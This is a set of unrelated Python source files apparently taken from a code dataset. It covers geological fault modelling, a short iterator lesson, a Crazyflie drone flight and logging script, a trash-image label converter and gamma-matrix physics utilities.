unconformity_data)\n # look through existing features if there is a fault before an\n # unconformity\n # then add to the feature, once we get to an unconformity stop\n self._add_faults(domain_fault_feature_builder)\n\n # build feature\n domain_fault = domain_fault_feature_builder.build(**kwargs)\n domain_fault.type = 'domain_fault'\n # uc_feature = UnconformityFeature(uc_feature_base,0)\n # iterate over existing features and add the unconformity as a\n # region so the feature is only\n # evaluated where the unconformity is positive\n return self.add_unconformity(domain_fault, 0)\n\n def create_and_add_fault(self, fault_surface_data, displacement, **kwargs):\n \"\"\"\n Parameters\n ----------\n fault_surface_data : string\n name of the fault surface data in the dataframe\n displacement : displacement magnitude\n kwargs : additional kwargs for Fault and interpolators\n\n Returns\n -------\n fault : FaultSegment\n created fault\n \"\"\"\n self.parameters['features'].append(\n {'feature_type': 'fault', 'feature_name': fault_surface_data, 'displacement': displacement, **kwargs})\n\n displacement_scaled = displacement / self.scale_factor\n # create fault frame\n interpolator = self.get_interpolator(**kwargs)\n fault_frame_builder = StructuralFrameBuilder(interpolator,\n name=fault_surface_data,\n **kwargs)\n # add data\n fault_frame_data = self.data[\n self.data['feature_name'] == fault_surface_data].copy()\n if 'coord' not in fault_frame_data:\n fault_frame_data['coord'] = 0\n vals = fault_frame_data['val']\n if len(np.unique(vals[~np.isnan(vals)])) == 1:\n xyz = fault_frame_data[['X', 'Y', 'Z']].to_numpy()\n p1 = xyz[0, :] # fault_frame_data.loc[0 ,['X','Y']]\n p2 = xyz[-1, :] # fault_frame_data.loc[-1 ,['X','Y']]\n # get a vector that goes from p1-p2 and normalise\n vector = p1 - p2\n length = np.linalg.norm(vector)\n vector /= length\n # now create 
the orthogonal vector\n # newvector = np.zeros(3)\n length /= 3\n # length/=2\n # print(fault_frame_data)\n mask = ~np.isnan(fault_frame_data['nx'])\n vectors = fault_frame_data[mask][['nx', 'ny', 'nz']].to_numpy()\n lengths = np.linalg.norm(vectors, axis=1)\n vectors /= lengths[:, None]\n fault_frame_data.loc[mask, ['nx', 'ny', 'nz']] = vectors\n if 'strike' in fault_frame_data.columns and 'dip' in \\\n fault_frame_data.columns:\n fault_frame_data = fault_frame_data.drop(['dip', 'strike'],\n axis=1)\n # print(fault_frame_data)\n # if there is no slip direction data assume vertical\n if fault_frame_data[fault_frame_data['coord'] == 1].shape[0] == 0:\n logger.info(\"Adding fault frame slip\")\n loc = np.mean(fault_frame_data[['X', 'Y', 'Z']], axis=0)\n coord1 = pd.DataFrame([[loc[0], loc[1], loc[2], 0, 0, -1]],\n columns=normal_vector_headers())\n coord1['coord'] = 1\n fault_frame_data = pd.concat([fault_frame_data, coord1],\n sort=False)\n \n if fault_frame_data[fault_frame_data['coord'] == 2].shape[0] == 0:\n logger.info(\"Adding fault extent data as first and last point\")\n ## first and last point of the line\n value_data = fault_frame_data[fault_frame_data['val'] == 0]\n coord2 = value_data.iloc[[0, len(value_data) - 1]]\n coord2 = coord2.reset_index(drop=True)\n c2_scale = kwargs.get('length_scale',1.)\n coord2.loc[0, 'val'] = -1/c2_scale\n coord2.loc[1, 'val'] = 1/c2_scale\n coord2['coord'] = 2\n fault_frame_data = pd.concat([fault_frame_data, coord2],\n sort=False)\n fault_frame_builder.add_data_from_data_frame(fault_frame_data)\n # if there is no fault slip data then we could find the strike of\n # the fault and build\n # the second coordinate\n # if we add a region to the fault then the fault operator doesn't\n # work but for visualisation\n # we want to add a region!\n\n if 'splayregion' in kwargs and 'splay' in kwargs:\n # result['splayregionfeature'] = RegionFeature(kwargs['splayregion'])\n # apply splay to all parts of fault frame\n for i in range(3):\n # work out the values of the nodes where we want hard\n # constraints\n idc = np.arange(0, interpolator.support.n_nodes)[\n kwargs['splayregion'](interpolator.support.nodes)]\n val = kwargs['splay'][i].evaluate_value(\n interpolator.support.nodes[\n kwargs['splayregion'](interpolator.support.nodes), :])\n mask = ~np.isnan(val)\n fault_frame_builder[i].interpolator.add_equality_constraints(\n idc[mask], val[mask])\n # check if this fault overprint any existing faults exist in the stack\n overprinted = kwargs.get('overprinted', [])\n self._add_faults(fault_frame_builder[0],overprinted)\n self._add_faults(fault_frame_builder[1],overprinted)\n self._add_faults(fault_frame_builder[2],overprinted)\n\n fault_frame = fault_frame_builder.build(**kwargs)\n if 'abut' in kwargs:\n fault_frame[0].add_region(lambda pos: kwargs['abut'].evaluate(pos))\n\n fault = FaultSegment(fault_frame, displacement=displacement_scaled,\n **kwargs)\n for f in reversed(self.features):\n if f.type == 'unconformity':\n fault.add_region(lambda pos: f.evaluate_value(pos) <= 0)\n break\n if displacement == 0:\n fault.type = 'fault_inactive'\n self._add_feature(fault)\n \n\n return fault\n\n def rescale(self, points):\n \"\"\"\n Convert from model scale to real world scale - in the future this\n should also do transformations?\n\n Parameters\n ----------\n points\n\n Returns\n -------\n \"\"\"\n points *= self.scale_factor\n points += self.origin\n return points\n\n def scale(self, points):\n \"\"\"\n Parameters\n ----------\n points : np.array((N,3),dtype=float)\n 
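# The orientation clean-up in create_and_add_fault() above, in isolation: turn
# each (nx, ny, nz) row into a unit vector by dividing by its row norm. The
# vectors are illustrative.
import numpy as np

vectors = np.array([[0., 0., 2.], [3., 4., 0.]])
lengths = np.linalg.norm(vectors, axis=1)
unit = vectors / lengths[:, None]              # broadcast norms down the rows
assert np.allclose(np.linalg.norm(unit, axis=1), 1.0)
print(unit)                                    # [[0, 0, 1], [0.6, 0.8, 0]]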
points to \n\n Returns\n -------\n \"\"\"\n points = points.copy()\n points[:, :] -= self.origin\n points /= self.scale_factor\n return points\n\n def voxet(self, nsteps=(50, 50, 25)):\n \"\"\"\n Returns a voxet dict with the nsteps specified\n\n Parameters\n ----------\n nsteps : tuple\n number of cells in\n\n Returns\n -------\n \"\"\"\n return {'bounding_box': self.bounding_box, 'nsteps': nsteps}\n\n def regular_grid(self, nsteps=(50, 50, 25), shuffle = True):\n \"\"\"\n Return a regular grid within the model bounding box\n\n Parameters\n ----------\n nsteps : tuple\n number of cells in x,y,z\n\n Returns\n -------\n xyz : np.array((N,3),dtype=float)\n locations of points in regular grid\n \"\"\"\n x = np.linspace(self.bounding_box[0, 0], self.bounding_box[1, 0],\n nsteps[0])\n y = np.linspace(self.bounding_box[0, 1], self.bounding_box[1, 1],\n nsteps[1])\n z = np.linspace(self.bounding_box[1, 2], self.bounding_box[0, 2],\n nsteps[2])\n xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')\n locs = np.array([xx.flatten(), yy.flatten(), zz.flatten()]).T\n if shuffle:\n np.random.shuffle(locs)\n return locs\n\n def evaluate_model(self, xyz, rescale=True):\n \"\"\"Evaluate the stratigraphic id at each location\n \n\n Parameters\n ----------\n xyz : np.array((N,3),dtype=float)\n locations\n rescale : bool\n whether to rescale the model\n\n Returns\n -------\n stratigraphic_id : np.array(N,dtype=int)\n the stratigraphic index for locations\n \n Examples\n --------\n Evaluate on a voxet\n\n >>> x = np.linspace(self.bounding_box[0, 0], self.bounding_box[1, 0],\n nsteps[0])\n >>> y = np.linspace(self.bounding_box[0, 1], self.bounding_box[1, 1],\n nsteps[1])\n >>> z = np.linspace(self.bounding_box[1, 2], self.bounding_box[0, 2],\n nsteps[2])\n >>> xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')\n >>> xyz = np.array([xx.flatten(), yy.flatten(), zz.flatten()]).T\n >>> model.evaluate_model(xyz)\n\n Evaluate on points defined by regular grid function\n \n >>> model.evaluate_model(model.regular_grid())\n\n\n Evaluate on a map\n \n >>> x = np.linspace(self.bounding_box[0, 0], self.bounding_box[1, 0],\n nsteps[0])\n >>> y = np.linspace(self.bounding_box[0, 1], self.bounding_box[1, 1],\n nsteps[1])\n >>> xx, yy = np.meshgrid(x, y, indexing='ij')\n >>> zz = np.zeros_like(yy)\n >>> xyz = np.array([xx.flatten(), yy.flatten(), zz.flatten()]).T\n >>> model.evaluate_model(xyz)\n \n \"\"\"\n strat_id = np.zeros(xyz.shape[0],dtype=int)\n for group in self.stratigraphic_column.keys():\n feature_id = self.feature_name_index.get(group, -1)\n if feature_id >= 0:\n feature = self.features[feature_id]\n vals = feature.evaluate_value(xyz)\n for series in self.stratigraphic_column[group].values():\n strat_id[np.logical_and(vals < series.get('max',feature.max()), vals > series.get('min',feature.min()))] = series['id']\n if feature_id == -1:\n logger.error('Model does not contain {}'.format(group))\n return strat_id\n\n def get_feature_by_name(self, feature_name):\n \"\"\"Returns a feature from the mode given a name\n\n\n Parameters\n ----------\n feature_name : string\n the name of the feature\n\n Returns\n -------\n feature : GeologicalFeature\n the geological feature with the specified name, or none if no feature\n \"\"\"\n feature_index = self.feature_name_index.get(feature_name,-1)\n if feature_index >0:\n return self.features[feature_index]\n else:\n return None\n\n def evaluate_feature_value(self, feature_name, xyz, scale=True):\n \"\"\"Evaluate the scalar value of the geological feature given the name at locations\n 
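# The core of evaluate_model() above, isolated: bucket scalar-field values into
# stratigraphic ids with a boolean mask per series. The column dict is made up;
# 0 stays behind as the "unassigned" id, exactly like the np.zeros default.
import numpy as np

column = {'unit_a': {'min': 0., 'max': 10., 'id': 1},
          'unit_b': {'min': 10., 'max': 20., 'id': 2}}
vals = np.array([-5., 3., 12., 25.])
strat_id = np.zeros(vals.shape[0], dtype=int)
for series in column.values():
    mask = np.logical_and(vals > series['min'], vals < series['max'])
    strat_id[mask] = series['id']
print(strat_id)                                # [0 1 2 0]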
xyz\n\n Parameters\n ----------\n feature_name : string\n name of the feature\n xyz : np.array((N,3))\n locations to evaluate\n scale : bool, optional\n whether to scale real world points into model scale, by default True\n\n Returns\n -------\n np.array((N))\n vector of scalar values\n \"\"\"\n feature = self.get_feature_by_name(feature_name)\n if feature:\n if scale:\n scaled_xyz = self.scale(xyz)\n return feature.evaluate_value(scaled_xyz)\n else:\n return np.zeros(xyz.shape[0])\n\n def evaluate_feature_gradient(self, feature_name, xyz, scale=True):\n \"\"\"Evaluate the gradient of the geological feature at a location\n\n Parameters\n ----------\n feature_name : string\n name of the geological feature \n xyz : np.array((N,3))\n locations to evaluate\n scale : bool, optional\n whether to scale real world points into model scale, by default True\n\n Returns\n -------\n results : np.array((N,3))\n gradient of the scalar field at the locations specified\n \"\"\"\n feature = self.get_feature_by_name(feature_name)\n if feature:\n if scale:\n scaled_xyz = self.scale(xyz)\n return feature.evaluate_gradient(scaled_xyz)\n else:\n return np.zeros(xyz.shape[0]) ","sub_path":"LoopStructural/modelling/core/geological_model.py","file_name":"geological_model.py","file_ext":"py","file_size_in_byte":43573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"497887622","text":"# __author__: Stanley\n# date: 2018/3/28\n\n# 生成器都是迭代器,迭代器不一定是生成器。\n\nl = [1,2,3,5]\nd = iter(l)\nprint(d) # \n\n# 迭代器(两个条件)\n# 1.有inter方法。\n# 2.有next方法。\n\n\n# for 循环内部三件事:\n# 1.调用可以迭代对象的iter方法,返回一个迭代器对象\n# 2.不断调用迭代器对象的next方法。\n# 3.捕获迭代器异常,进行处理stopiteration。\nfor i in d:\n print(i)\n\n","sub_path":"day17/迭代器.py","file_name":"迭代器.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"421121812","text":"import logging\nimport time\nimport json\nimport numpy as np\nimport cflib.crtp\nfrom cflib.crazyflie import Crazyflie\nfrom cflib.crazyflie.log import LogConfig\n\n# Specify the uri of the drone to which we want to connect (if your radio\n# channel is X, the uri should be 'radio://0/X/2M/E7E7E7E7E7')\nuri = 'radio://0/0/2M/E7E7E7E7E7'\n\n# Specify the variables we want to log (all at 100 Hz)\nvariables = [\n # State estimates (stock code)\n 'ae483log.o_x',\n 'ae483log.o_y',\n 'ae483log.o_z',\n 'ae483log.psi',\n 'ae483log.theta',\n 'ae483log.phi',\n 'ae483log.v_x',\n 'ae483log.v_y',\n 'ae483log.v_z',\n # Measurements\n 'ae483log.w_x',\n 'ae483log.w_y',\n 'ae483log.w_z',\n 'ae483log.n_x',\n 'ae483log.n_y',\n 'ae483log.r',\n 'ae483log.a_z',\n # Setpoint\n 'ae483log.o_x_des',\n 'ae483log.o_y_des',\n 'ae483log.o_z_des',\n # Motor power commands\n 'ae483log.m_1',\n 'ae483log.m_2',\n 'ae483log.m_3',\n 'ae483log.m_4',\n]\n\n\nclass SimpleClient:\n def __init__(self, uri, use_controller=False, use_observer=False):\n self.init_time = time.time()\n self.use_controller = use_controller\n self.use_observer = use_observer\n self.cf = Crazyflie(rw_cache='./cache')\n self.cf.connected.add_callback(self.connected)\n self.cf.connection_failed.add_callback(self.connection_failed)\n self.cf.connection_lost.add_callback(self.connection_lost)\n self.cf.disconnected.add_callback(self.disconnected)\n print(f'Connecting to {uri}')\n self.cf.open_link(uri)\n self.is_connected = False\n self.data = {}\n\n def connected(self, uri):\n print(f'Connected to {uri}')\n self.is_connected = True\n\n # Start logging\n 
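# The notes in the iterator file above say, in translation: an iterator needs
# both __iter__ and __next__; a for loop calls iter() on the iterable, calls
# next() repeatedly, and stops when StopIteration is raised. A tiny countdown
# iterator demonstrating all three points:
class Countdown:
    def __init__(self, n):
        self.n = n

    def __iter__(self):
        return self                    # the object is its own iterator

    def __next__(self):
        if self.n <= 0:
            raise StopIteration        # this is what ends a for loop
        self.n -= 1
        return self.n + 1

print(list(Countdown(3)))              # [3, 2, 1]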
self.logconfs = []\n self.logconfs.append(LogConfig(name=f'LogConf0', period_in_ms=10))\n num_variables = 0\n for v in variables:\n num_variables += 1\n if num_variables > 5: # <-- could increase if you paid attention to types / sizes (max 30 bytes per packet)\n num_variables = 0\n self.logconfs.append(LogConfig(name=f'LogConf{len(self.logconfs)}', period_in_ms=10))\n self.data[v] = {'time': [], 'data': []}\n self.logconfs[-1].add_variable(v)\n for logconf in self.logconfs:\n try:\n self.cf.log.add_config(logconf)\n logconf.data_received_cb.add_callback(self.log_data)\n logconf.error_cb.add_callback(self.log_error)\n logconf.start()\n except KeyError as e:\n print(f'Could not start {logconf.name} because {e}')\n for v in logconf.variables:\n print(f' - {v.name}')\n except AttributeError:\n print(f'Could not start {logconf.name} because of bad configuration')\n for v in logconf.variables:\n print(f' - {v.name}')\n\n # Reset the stock EKF\n self.cf.param.set_value('kalman.resetEstimation', 1)\n\n # Enable the controller (1 for stock controller, 4 for ae483 controller)\n if self.use_controller:\n self.cf.param.set_value('stabilizer.controller', 4)\n else:\n self.cf.param.set_value('stabilizer.controller', 1)\n\n # Enable the observer (0 for disable, 1 for enable)\n if self.use_observer:\n self.cf.param.set_value('ae483par.use_observer', 1)\n else:\n self.cf.param.set_value('ae483par.use_observer', 0)\n\n def connection_failed(self, uri, msg):\n print(f'Connection to {uri} failed: {msg}')\n\n def connection_lost(self, uri, msg):\n print(f'Connection to {uri} lost: {msg}')\n\n def disconnected(self, uri):\n print(f'Disconnected from {uri}')\n self.is_connected = False\n\n def log_data(self, timestamp, data, logconf):\n for v in logconf.variables:\n self.data[v.name]['time'].append(timestamp)\n self.data[v.name]['data'].append(data[v.name])\n\n def log_error(self, logconf, msg):\n print(f'Error when logging {logconf}: {msg}')\n\n def move(self, x, y, z, yaw, dt):\n print(f'Move to {x}, {y}, {z} with yaw {yaw} degrees for {dt} seconds')\n start_time = time.time()\n while time.time() - start_time < dt:\n self.cf.commander.send_position_setpoint(x, y, z, yaw)\n time.sleep(0.1)\n\n def move_smooth(self, p1, p2, yaw, dt):\n print(f'Move smoothly from {p1} to {p2} with yaw {yaw} degrees in {dt} seconds')\n p1 = np.array(p1)\n p2 = np.array(p2)\n start_time = time.time()\n while True:\n current_time = time.time()\n s = (current_time - start_time) / dt\n p = (1 - s) * p1 + (s * p2)\n self.cf.commander.send_position_setpoint(p[0], p[1], p[2], yaw)\n if s >= 1:\n return\n else:\n time.sleep(0.1)\n\n def stop(self, dt):\n print(f'Stop for {dt} seconds')\n self.cf.commander.send_stop_setpoint()\n start_time = time.time()\n while time.time() - start_time < dt:\n time.sleep(0.1)\n\n def disconnect(self):\n self.cf.close_link()\n\n def write_data(self, filename='logged_data.json'):\n with open(filename, 'w') as outfile:\n json.dump(self.data, outfile, indent=4, sort_keys=False)\n\nif __name__ == '__main__':\n # Initialize everything\n logging.basicConfig(level=logging.ERROR)\n cflib.crtp.init_drivers()\n\n # Create and start the client that will connect to the drone\n client = SimpleClient(uri, use_controller=True, use_observer=False)\n while not client.is_connected:\n print(f' ... 
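# The math inside move_smooth() above, without the radio and sleep plumbing: a
# setpoint slides from p1 to p2 as normalized time s runs 0 -> 1. Clamping s is
# a small robustness tweak so a late final tick still lands exactly on p2.
import numpy as np

def interp_setpoint(p1, p2, s):
    s = min(max(s, 0.0), 1.0)
    return (1 - s) * np.asarray(p1) + s * np.asarray(p2)

for s in (0.0, 0.5, 1.0, 1.2):
    print(interp_setpoint([0., 0., 0.5], [0.5, 0., 0.5], s))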
connecting ...')\n time.sleep(1.0)\n\n # Leave time at the start to initialize\n client.stop(1.0)\n\n # Take off and hover (with zero yaw)\n client.move(0.0, 0.0, 0.15, 0.0, 1.0)\n client.move(0.0, 0.0, 0.50, 0.0, 1.0)\n\n # Fly in a square five times (with a pause at each corner)\n num_squares = 5\n for i in range(num_squares):\n client.move_smooth([0.0, 0.0, 0.5], [0.5, 0.0, 0.5], 0.0, 2.0)\n client.move(0.5, 0.0, 0.5, 0.0, 1.0)\n client.move_smooth([0.5, 0.0, 0.5], [0.5, 0.5, 0.5], 0.0, 2.0)\n client.move(0.5, 0.5, 0.5, 0.0, 1.0)\n client.move_smooth([0.5, 0.5, 0.5], [0.0, 0.5, 0.5], 0.0, 2.0)\n client.move(0.0, 0.5, 0.5, 0.0, 1.0)\n client.move_smooth([0.0, 0.5, 0.5], [0.0, 0.0, 0.5], 0.0, 2.0)\n client.move(0.0, 0.0, 0.5, 0.0, 1.0)\n\n # Go back to hover (with zero yaw) and prepare to land\n client.move(0.0, 0.0, 0.50, 0.0, 1.0)\n client.move(0.0, 0.0, 0.15, 0.0, 1.0)\n\n # Land\n client.stop(1.0)\n\n # Disconnect from drone\n client.disconnect()\n\n # Write data from flight\n client.write_data('hardware_data.json')\n","sub_path":"lab08/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"337393891","text":"import json\nimport csv\nfrom os import listdir\nfrom os.path import isfile, join\n\nimagesPath = \"../../public/assets/images/\"\nCSVFileName = \"GroundTruth_TrueFalseByClass.csv\" #output name\n\n#Classes\nUnbrokenGlass = [6, 23, 26]\nBrokenGlass = [9]\nPlasticBagWrapper = [36, 37, 38, 39, 40, 41, 42]\nPlasticBottle = [4, 5]\n#PlasticContainer = [43, 44, 45, 46, 47]\nOtherPlastic = [7, 21, 24, 27, 29, 48, 49, 55, 43, 44, 45, 46, 47]\nAluminumCan = [10, 11, 12]\nOtherAluminum = [0, 2, 50]\nPaperBag = [34, 35]\nOtherPaper = [20, 30, 31, 32, 33, 56]\nFoodWaste = [25]\nOther = [1, 3, 8, 13, 14, 15, 16, 17, 18, 19, 22, 28, 51, 52, 53, 54, 57, 58, 59]\n #[UnbrokenGlass, BrokenGlass, PlasticBagWrapper, PlasticContainer, OtherPlastic, \\\nClassList = [UnbrokenGlass, BrokenGlass, PlasticBagWrapper, PlasticBottle, OtherPlastic, \\\n AluminumCan, OtherAluminum, PaperBag, OtherPaper, FoodWaste, Other]\nNumClasses = len(ClassList)\nheaders = [\"id_TACO\", \"file_name\", \"UnbrokenGlass\", \"BrokenGlass\", \"PlasticBagWrapper\", \\\n \"PlasticBottle\", \"OtherPlastic\", \"AluminumCan\", \"OtherAluminum\", \"PaperBag\", \"OtherPaper\", \\\n \"FoodWaste\", \"Other\"]\n\ndef ConvertJSONCategoriesToCSVCategories(categoryList):\n #categoryList is the categories for an image (e.g. say img45 categories are [6, 6, 3, 25])\n CatToCSV = [0]*NumClasses #Empty list\n for i in range(NumClasses): #Loop the classes (e.g. 
UnbrokenGlass)\n CurrentClassList = ClassList[i]\n CurrentClassCount = 0\n for c in range(len(CurrentClassList)): #Loop the categories from json\n CurrentSubClassID = CurrentClassList[c]\n #Add the amount of times this class appears in the image\n CurrentClassCount = CurrentClassCount + categoryList.count(CurrentSubClassID)\n if CurrentClassCount > 0:\n CurrentClassCount = 1\n CatToCSV[i] = CurrentClassCount\n return CatToCSV\n\n#Read json file\nwith open(\"images.json\") as file:\n data = json.load(file)\n\n#Get all pilot file names for cross-referencing the images.json file to find count per class (per image)\n# batches = []\n# batchNums = [1,2,3,4,5,6,7,8,9,14,15] #Batches numbers in Pilot folder\n# numBatches = len(batchNums)\n# batchPath = '../images/batch_'\n# for i in range(numBatches):\n# batchNum = str(batchNums[i])\n# currentBatchPath = batchPath + batchNum\n# #get list of all files in batch i\n# imageNames = [f for f in listdir(currentBatchPath) if isfile(join(currentBatchPath, f))]\n# for n in range(len(imageNames)): #concat 'batch_i/' to file names\n# imageNames[n] = 'batch_' + batchNum + '/' + imageNames[n]\n# batches = batches + imageNames #concat filenames to prev batch\n\n#get list of all files\nimageNames = [f.replace(\"-\",\"/\") for f in listdir(imagesPath) if isfile(join(imagesPath, f))]\n\n#Write data to .csv\nwith open(CSVFileName, \"w\") as file:\n csv_file = csv.writer(file)\n\n #Write column headers\n csv_file.writerow(headers)\n\n #Loop through each image, save out class count to csv\n for item in data[\"images\"]:\n CatCSV = ConvertJSONCategoriesToCSVCategories(item['categories'])\n if any(item['file_name'] in s for s in imageNames): #only save out class count if it's in pilot\n csv_file.writerow([item['id'], item['file_name'], CatCSV[0], CatCSV[1], CatCSV[2], CatCSV[3], \\\n CatCSV[4], CatCSV[5], CatCSV[6], CatCSV[7], CatCSV[8], CatCSV[9], CatCSV[10] ])\n","sub_path":"src/SimulateClassifier/jsonToCsv.py","file_name":"jsonToCsv.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"309665650","text":"import numpy\nimport misc\n\n# def lattice_momentum_unit(spatial_extent,boundary_conditions='anti-periodic'):\n# return (2*numpy.pi/spatial_extent)\n\n# def brick_wall_deviation_factor(p2,q2,m,spatial_extent):\n# lm = quantum.lattice_momentum(spatial_extent)\n# p2_actual = p2*(lm**2)\n# q2_actual = q2*(lm**2)\n# E = numpy.sqrt(p2_actual + m**2)\n# return (4*p2_actual - q2_actual)/(4*m*(E+m))\n\n\ndef commutator(x, y):\n return x*y - y*x\n\n\ndef anticommutator(x, y):\n return x*y + y*x\n\nI = numpy.mat(numpy.identity(4))\n\n# Pauli matrices\npauli = []\npauli.append(None)\npauli.append(numpy.mat([[0, 1.0],\n [1.0, 0]]))\npauli.append(numpy.mat([[0, -1.0j],\n [1.0j, 0]]))\npauli.append(numpy.mat([[1.0, 0],\n [0, -1.0]]))\n\nI2 = numpy.mat(numpy.identity(2))\nO2 = numpy.mat(numpy.zeros((2, 2)))\n\ngamma = {}\nsigma = {}\n\n# Gamma matrices (Dirac basis)\ngamma['dirac'] = []\ngamma['dirac'].append(numpy.bmat([[I2, O2],\n [O2, -1.0*I2]]))\nfor i in range(1, 4):\n gamma['dirac'].append(\n numpy.bmat(\n [[O2, 1.0*pauli[i]],\n [-1.0*pauli[i], O2]]))\ngamma['dirac'].append(None)\ngamma['dirac'].append(\n 1j * gamma['dirac'][0] * gamma['dirac'][1]\n * gamma['dirac'][2] * gamma['dirac'][3])\n\nsigma['dirac'] = numpy.empty((4, 4), dtype=object)\nfor mu in range(0, 4):\n for nu in range(0, 4):\n sigma['dirac'][mu, nu] = 0.5j * (\n gamma['dirac'][mu]*gamma['dirac'][nu]\n - 
gamma['dirac'][nu]*gamma['dirac'][mu])\n\n# Schroer's Representation\ngamma['schroers'] = []\ngamma['schroers'].append(numpy.bmat([[I2, O2],\n [O2, -1.0*I2]]))\nfor i in range(1, 4):\n gamma['schroers'].append(numpy.bmat([[O2, -1.0j*pauli[i]],\n [1.0j*pauli[i], O2]]))\ngamma['schroers'].append(None)\ngamma['schroers'].append(\n gamma['schroers'][1] * gamma['schroers'][2]\n * gamma['schroers'][3] * gamma['schroers'][0])\n\nsigma['schroers'] = numpy.empty((4, 4), dtype=object)\nfor mu in range(0, 4):\n for nu in range(0, 4):\n sigma['schroers'][mu, nu] = 0.5j * (\n gamma['schroers'][mu] * gamma['schroers'][nu]\n - gamma['schroers'][nu]*gamma['schroers'][mu])\n\nfor mu in range(0, 4):\n for nu in range(0, 4):\n if mu == nu:\n assert (gamma['schroers'][mu]*gamma['schroers'][nu] + gamma['schroers'][nu]*gamma['schroers'][mu] == 2*I).all()\n else:\n assert (gamma['schroers'][mu]*gamma['schroers'][nu] + gamma['schroers'][nu]*gamma['schroers'][mu] == 0*I).all()\n\n\n# QDP++ Representation\ngamma['qdp'] = []\ngamma['qdp'].append(numpy.bmat([[O2, I2],\n [I2, O2]]))\ngamma['qdp'].append(numpy.bmat([[O2, 1.0j*pauli[1]],\n [-1.0j*pauli[1], O2]]))\ngamma['qdp'].append(numpy.bmat([[O2, -1.0j*pauli[2]],\n [1.0j*pauli[2], O2]]))\ngamma['qdp'].append(numpy.bmat([[O2, 1.0j*pauli[3]],\n [-1.0j*pauli[3], O2]]))\ngamma['qdp'].append(None)\ngamma['qdp'].append(\n gamma['qdp'][1] * gamma['qdp'][2] * gamma['qdp'][3] * gamma['qdp'][0])\n\nsigma['qdp'] = numpy.empty((4, 4), dtype=object)\nfor mu in range(0, 4):\n for nu in range(0, 4):\n sigma['qdp'][mu, nu] = 0.5j * (\n gamma['qdp'][mu] * gamma['qdp'][nu]\n - gamma['qdp'][nu] * gamma['qdp'][mu])\n\nfor mu in range(0, 4):\n for nu in range(0, 4):\n if mu == nu:\n assert (gamma['qdp'][mu]*gamma['qdp'][nu] + gamma['qdp'][nu]*gamma['qdp'][mu] == 2*I).all()\n else:\n assert (gamma['qdp'][mu]*gamma['qdp'][nu] + gamma['qdp'][nu]*gamma['qdp'][mu] == 0*I).all()\n\nGamma = {}\nfor eucl_repr in ['schroers','qdp']:\n Gamma[eucl_repr] = {}\n Gamma[eucl_repr]['unpol'] = 0.5 * (I + gamma[eucl_repr][0])\n Gamma[eucl_repr]['pol'] = 0.5*(I + gamma[eucl_repr][0])*1.0j*gamma[eucl_repr][5]*numpy.tensordot(gamma[eucl_repr][1:4],[0,0,1],axes=([0,0]))\n Gamma[eucl_repr]['pol+'] = 0.5*(Gamma[eucl_repr]['unpol'] + Gamma[eucl_repr]['pol'])\n Gamma[eucl_repr]['pol-'] = 0.5*(Gamma[eucl_repr]['unpol'] - Gamma[eucl_repr]['pol'])\n\nepsilon = numpy.zeros((3, 3, 3))\nfor i in range(0, 3):\n for j in range(0, 3):\n for k in range(0, 3):\n if i == j or i == k or j == k:\n epsilon[i, j, k] = 0\n elif (i, j, k) in [(0, 1, 2), (1, 2, 0), (2, 0, 1)]:\n epsilon[i, j, k] = 1\n else:\n epsilon[i, j, k] = -1\n\n\ndef F3(G, J, representation='qdp'):\n def temp_function(p, pp, m):\n ppdotgamma = numpy.tensordot(pp,\n gamma[representation][1:4],\n axes=([0, 0]))\n pdotgamma = numpy.tensordot(p,\n gamma[representation][1:4],\n axes=([0, 0]))\n Epp = numpy.sqrt(numpy.dot(pp, pp) + m**2)\n Ep = numpy.sqrt(numpy.dot(p, p) + m**2)\n lhs = gamma[representation][0] - (1.0j * (ppdotgamma/Epp)) + (m/Epp)*I\n rhs = gamma[representation][0] - (1.0j * (pdotgamma/Ep)) + (m/Ep)*I\n return numpy.real_if_close(0.25 * numpy.trace(G * lhs * J * rhs,\n axis1=-2,\n axis2=-1))\n return temp_function\n\n\ndef F2(G, representation='qdp'):\n def temp_function(p, m):\n Ep = numpy.sqrt(numpy.dot(p, p) + m**2)\n pdotgamma = numpy.tensordot(p,\n gamma[representation][1:4],\n axes=([0,0]))\n lhs = gamma[representation][0] - (1.0j * (pdotgamma/Ep)) + (m/Ep)*I\n # return 0.25 * numpy.trace(G * lhs)\n return numpy.real_if_close(0.5 * 
numpy.trace(G * lhs))\n return temp_function\n\n\ndef fh_signal(G, J, representation='qdp'):\n def temp_function(p, pp, m):\n assert numpy.allclose(numpy.dot(pp, pp), numpy.dot(p, p)), (\n 'Supplied p and q do not conform to Breit frame')\n return F3(G, J, representation=representation)(p, pp, m)/F2(G, representation=representation)(p, m)\n return temp_function\n\n# def feynman_hellmann_coefficients(G,current,component,representation='qdp'):\n# if current == 'vector':\n# def temp_function(p,pp,m):\n# q = numpy.array(pp) - numpy.array(p)\n# return numpy.array([fh_signal(G,gamma[representation][component],\n# representation=representation)(p,pp,m),\n# fh_signal(G,\n# numpy.tensordot(sigma[representation][component,1:4],\n# q,axes=([0,0]))/(2*m),\n# representation=representation)(p,pp,m)])\n# elif current == 'axial':\n# def temp_function(p,pp,m):\n# q = numpy.concatenate(([0.0],numpy.array(pp)-numpy.array(p)))\n# return numpy.array([\n# fh_signal(G,\n# gamma[representation][component]*gamma[representation][5],\n# representation=representation)(p,pp,m),\n# fh_signal(G,\n# gamma[representation][5]*(1.0j*q[component])/(2*m),\n# representation=representation)(p,pp,m)])\n# else:\n# exit('Error: Unrecognised current ' + current)\n# return temp_function\n","sub_path":"acpy/quantum.py","file_name":"quantum.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"475018899","text":"#!/usr/bin/env python3\n\nfrom QUBEKit.decorators import for_all_methods, timer_logger\n\nfrom pathlib import Path\n\nfrom rdkit.Chem import AllChem, MolFromPDBFile, Descriptors, MolToSmiles, MolToSmarts, MolToMolFile, MolFromMol2File, MolFromMolFile, rdPartialCharges\nfrom 